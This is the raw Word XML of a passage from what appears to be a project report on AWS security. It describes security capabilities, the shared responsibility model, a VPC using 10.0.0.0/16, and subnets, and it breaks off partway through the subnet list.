    <w:p w14:paraId="3B7B8EB4" w14:textId="4F3185E3" w:rsidR="002A55B8" w:rsidRPr="00D77DFE" w:rsidRDefault="0025361B" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc223521083"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.4 </w:t>
      </w:r>
      <w:r w:rsidR="002A55B8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AWS Security Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="6A64FA9E" w14:textId="64D115E3" w:rsidR="00890413" w:rsidRPr="00D77DFE" w:rsidRDefault="00AB515D" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r w:rsidR="00890413" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> offers </w:t>
      </w:r>
      <w:r w:rsidR="00FC5260" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00890413" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00555540" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">comprehensive </w:t>
      </w:r>
      <w:r w:rsidR="00890413" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">set of security </w:t>
      </w:r>
      <w:r w:rsidR="00555540" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>controls which</w:t>
      </w:r>
      <w:r w:rsidR="00890413" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF4561" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">are </w:t>
      </w:r>
      <w:r w:rsidR="00890413" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">designed to safeguard cloud resources and operations across their entire lifecycle. These </w:t>
      </w:r>
      <w:r w:rsidR="00555540" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">security </w:t>
      </w:r>
      <w:r w:rsidR="00890413" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">tools help organizations </w:t>
      </w:r>
      <w:r w:rsidR="00555540" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00890413" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">protect </w:t>
      </w:r>
      <w:r w:rsidR="00555540" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">their </w:t>
      </w:r>
      <w:r w:rsidR="00890413" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>sensitive data, manage user accounts, and secure applications from unauthorized access, while also enabling centralized oversight of user roles, privileges, and access rights across complex IT environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEF6C58" w14:textId="4441970E" w:rsidR="00890413" w:rsidRPr="00D77DFE" w:rsidRDefault="00890413" w:rsidP="00A02D1D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00555540" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">AWS </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">platform </w:t>
      </w:r>
      <w:r w:rsidR="00555540" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>give</w:t>
      </w:r>
      <w:r w:rsidR="004613B2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00555540" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>administrators</w:t>
      </w:r>
      <w:r w:rsidR="00555540" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> features </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>to implement precise security controls at both the network and resource levels, ensuring that only authorized interactions</w:t>
      </w:r>
      <w:r w:rsidR="006F0D6E" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be operated</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">. Continuous monitoring of network flows and user activity supports the early detection of anomalies or suspicious </w:t>
      </w:r>
      <w:r w:rsidR="006551D6" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>behaviour</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">, enabling </w:t>
      </w:r>
      <w:r w:rsidR="006F0D6E" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">fast </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">response to potential threats. In addition, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">AWS </w:t>
      </w:r>
      <w:r w:rsidR="00B15F1B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>provides</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> automated compliance and auditing capabilities, allowing organizations to regularly assess their cloud configurations against internal policies and external regulatory standards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B0BD77" w14:textId="2CBB892B" w:rsidR="006431FC" w:rsidRPr="00D77DFE" w:rsidRDefault="00890413" w:rsidP="00A02D1D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">All security </w:t>
      </w:r>
      <w:r w:rsidR="006F0D6E" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">mechanisms </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">operate under the AWS Shared Responsibility Model. Under this framework, AWS is responsible for maintaining the security of the infrastructure, including physical data centers, servers, and core services, while customers are </w:t>
      </w:r>
      <w:r w:rsidR="006F0D6E" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">only responsible </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>for protecting and managing their own workloads, configurations, applications, and data stored in the cloud.</w:t>
      </w:r>
      <w:r w:rsidR="00272961" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="resource5" w:history="1">
        <w:r w:rsidR="00272961" w:rsidRPr="00D77DFE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          </w:rPr>
          <w:t>[5]</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="65921D12" w14:textId="51229209" w:rsidR="00106ED0" w:rsidRPr="00D77DFE" w:rsidRDefault="0025361B" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc223521084"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.5 </w:t>
      </w:r>
      <w:r w:rsidR="00A62A28" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Virtual Private Cloud (VPC)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="5B7FBFCB" w14:textId="43D028F7" w:rsidR="006431FC" w:rsidRPr="00D77DFE" w:rsidRDefault="006431FC" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">A Virtual Private </w:t>
      </w:r>
      <w:r w:rsidR="001618B2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Cloud is</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> an isolated network domain within AWS</w:t>
      </w:r>
      <w:r w:rsidR="00B15F1B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D748C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>which</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F0616" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>structured</w:t>
      </w:r>
      <w:r w:rsidR="005D748C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a goal to</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> replicate the organization and operation of a standard on-premises network. It </w:t>
      </w:r>
      <w:r w:rsidR="005D748C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>assigns</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the IP addressing </w:t>
      </w:r>
      <w:r w:rsidR="005D748C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">range </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">and supports the placement of cloud resources within distinct, secured segments. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D978E1A" w14:textId="260CCE89" w:rsidR="000A2A2A" w:rsidRPr="00D77DFE" w:rsidRDefault="006431FC" w:rsidP="00A02D1D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">In this project, the VPC was configured </w:t>
      </w:r>
      <w:r w:rsidR="005D748C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">to use </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>the CIDR</w:t>
      </w:r>
      <w:r w:rsidR="00085AC3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Classless Inter-Domain Routing)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> block 10.0.0.0/16, offering sufficient private IP addresses for distributing resources </w:t>
      </w:r>
      <w:r w:rsidR="005D748C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">via </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>several subnets. The VPC maintains strong network protection and separation by keeping public-facing systems and internal backend resources distinct, with traffic control and segmentation enforced using firewalls, subnet rules, and routing policies.</w:t>
      </w:r>
      <w:r w:rsidR="00272961" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="19" w:name="paragraph6"/>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"resource6"</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72961" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidR="009A7F16" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBE90B3" w14:textId="0147878C" w:rsidR="005D748C" w:rsidRPr="00D77DFE" w:rsidRDefault="0025361B" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc223521085"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.6 </w:t>
      </w:r>
      <w:r w:rsidR="00A62A28" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Subnets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="24A1FEB8" w14:textId="77777777" w:rsidR="00A02D1D" w:rsidRDefault="002A55B8" w:rsidP="003A1361">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Subnets divide a VPC into smaller IP address ranges, allowing logical separation of resources for security, routing, and management purposes</w:t>
      </w:r>
      <w:r w:rsidR="002F2EAE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="21" w:name="paragraph7"/>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"resource7"</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F2EAE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidR="009A7F16" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735AD8BB" w14:textId="40EB7987" w:rsidR="002A55B8" w:rsidRPr="00D77DFE" w:rsidRDefault="002A55B8" w:rsidP="00A02D1D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>In the simulated environment, four subnets were created:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1492874A" w14:textId="77777777" w:rsidR="002F4B94" w:rsidRDefault="002A55B8" w:rsidP="002F4B94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F4B94">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>10.0.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793DAADB" w14:textId="77777777" w:rsidR="002F4B94" w:rsidRDefault="002A55B8" w:rsidP="002F4B94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F4B94">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>10.0.2.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB9FD83" w14:textId="77777777" w:rsidR="002F4B94" w:rsidRDefault="002A55B8" w:rsidP="002F4B94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F4B94">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>10.0.3.0/24</w:t>
      </w:r>
    </w:p>
